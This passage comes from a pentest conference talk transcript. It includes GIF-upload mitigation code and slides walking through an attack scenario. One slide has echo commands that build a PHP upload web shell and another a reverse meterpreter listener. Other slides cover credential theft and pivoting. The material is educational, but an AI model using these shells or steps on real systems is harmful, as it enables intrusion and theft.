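    except (ValueError, IndexError) as exc:   # truncated or malformed structure
        return False, f"malformed GIF: {exc}"
    return True, "ok"


def strip_comments(data):
    """Mitigation: rebuild the file without comment blocks (re-encoding with an
    image library is the stronger version of the same idea)."""
    out = bytearray(data[:_header_len(data)])
    for kind, _, raw in gif_blocks(data):
        if kind != "comment":
            out += raw
    return bytes(out) + b"\x3B"
```

Content checks like this are bypassable on their own; the stronger control is storing uploads outside the web root or with script execution disabled in the upload directory, so a file that gets through is still never run as PHP.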
  • 81. Scenario 8: AppSec2NetSec
    3) Shell is only the beginning, you know? ☺
    In Windows, by default (i.e. next / next / finish install) Apache runs as SYSTEM, i.e. more than Admin, no need to escalate ☺
  • 82. Scenario 8: AppSec2NetSec
    3) Getting comfortable (no tftp, etc.)
    Creating a file upload PHP shell from a DOS shell..
    NOTE: "^" is the escape character in the Windows cmd shell
    echo ^<?php > file_upload.php
    echo if (isset($_POST['Action']) ^&^& $_POST['Action'] == 'go') { >> file_upload.php
    echo if (@move_uploaded_file($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']) == false) { >> file_upload.php
    echo die('Error when uploading: '.$_FILES['MyFile']['error']); >> file_upload.php
    echo } >> file_upload.php
    echo else { >> file_upload.php
    echo echo 'upload ok!'; >> file_upload.php
    echo } >> file_upload.php
    echo } >> file_upload.php
    echo ?^> >> file_upload.php
    echo ^<html^>^<form action="" enctype="multipart/form-data" name="myform" id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^>^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255"/^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >> file_upload.php
  • 83. Scenario 8: AppSec2NetSec
    3) Now we’re ready to upload a reverse meterpreter shell ☺
  • 84. Scenario 8: AppSec2NetSec
    Check before meterpreter upload: AV Fingerprint via ‘tasklist’
  • 85. Scenario 8: AppSec2NetSec
    You are totally blocking port 80 outbound, huh? ☺
       # /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127 LPORT=80 E…
  • 86. Scenario 8: AppSec2NetSec
    LM hashes were disabled, NT LM hashes were tough to crack .. Time to improvise
  • 87. Scenario 8: AppSec2NetSec
    Map network with arp -a, etc via winenum: winenum is very scary…
  • 88. Scenario 8: AppSec2NetSec
    Getting GUI access:
  • 89. Scenario 8: AppSec2NetSec
    No need to crack our own password ☺
  • 90. Scenario 8: AppSec2NetSec
    If you can’t crack passwords you might be able to steal them.. Patience is worth its prize…
  • 91. Scenario 8: AppSec2NetSec
    While you are waiting, you might as well dump memory..
  • 92. Scenario 8: AppSec2NetSec
    Pivoting around using stolen passwords..
  • 93. Scenario 8: AppSec2NetSec
    Pivoting .. Where? ☺ Approach 1) Run History
  • 94. Scenario 8: AppSec2NetSec
    Approach 2) Merge winenum info
    PASSIVE Ping Sweep: Unique IPs & MACs from the ARP table of all popped boxes via winenum
  • 95. Scenario 8: AppSec2NetSec
    PASSIVE Local “Port scanning” from winenum
  • 96. Scenario 8: AppSec2NetSec
    Don’t forget about IPv6 & UDP ☺
  • 97. Scenario 8: AppSec2NetSec
    PASSIVE Remote “Port scanning” from winenum via active connections
  • 98. Scenario 8: AppSec2NetSec
    Admin shares (c$, d$, etc), SSL private keys, ..
  • 99. Scenario 8: AppSec2NetSec
    So you have hard-coded credentials in your scripts?
  • 100. Scenario 8: AppSec2NetSec
    Let’s try those …
  • 101. Scenario 8: AppSec2NetSec
    Trying…
  • 102. Scenario 8: AppSec2NetSec
    Seeing the shares thanks to your script credentials:
  • 103. Scenario 8: AppSec2NetSec
    Does your application store user credentials in clear-text on the user session files?
  • 104. Scenario 8: AppSec2NetSec
    Yup ☺
  • 105. Scenario 8: AppSec2NetSec
    And my personal favourite (only had to click OK ☺):
  • 106. Conclusion
    3 Strength Factors:
    1) Individual Skill
       • Skill > Intelligence + Talent (Hard work beats talent)
       • Hack your subconscious (!mental barriers)
       • Don’t stop: Eat it, breathe it, sleep it
    2) Game preparation
       • Prep ahead: Recon + analysis + plan
       • Scope like a pro: Negotiate scope, extensions, etc.
    3) Game performance
       • 1st Sweep: Shallow + wide analysis first
       • 2nd Sweep: Deep + narrow analysis of best options
       • Analyse only once
       • Don’t lose the will to fight + Take the hit
  • 107. Thanks to Brucon 5by5
    Brucon 5by5 sponsorship of OWASP OWTF
    http://blog.brucon.org/2013/02/the-5by5-race-is-on.html
  • 108. Thanks to OWASP GSoC 2013
    Google Student sponsorship of OWASP OWTF
    https://www.owasp.org/index.php/GSoC
    Student Proposals: April 22nd-May 3rd 2013. Still on time!
  • 109. Special thanks to
    OWASP Testing Guide contributors
    Finux Tech Weekly – Episode 17 – mins 31-49: http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3
    Finux Tech Weekly – Episode 12 – mins 33-38: http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3
    Exotic Liability – Episode 83 – mins 49-53: http://exoticliability.libsyn.com/exotic-liability-83-oh-yeah
    Eurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32
    Adi Mutu (@an_animal), Andrés Riancho (@w3af), Bharadwaj Machiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz (@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz (@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl (@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci (@sandrogauci)
  • 110. Q&A
    Abraham Aranguren
    @7a_ @owtfp
    abraham.aranguren@owasp.org
    http://7-a.org
    http://owtf.org
    Project Site (links to everything): http://owtf.org
    • Try OWTF: https://github.com/7a/owtf_releases
    • Try a demo report: https://github.com/7a/owtf_demos
    • Documentation: https://github.com/7a/owtf/wiki
    • Contribute/Download: https://github.com/7a/owtf
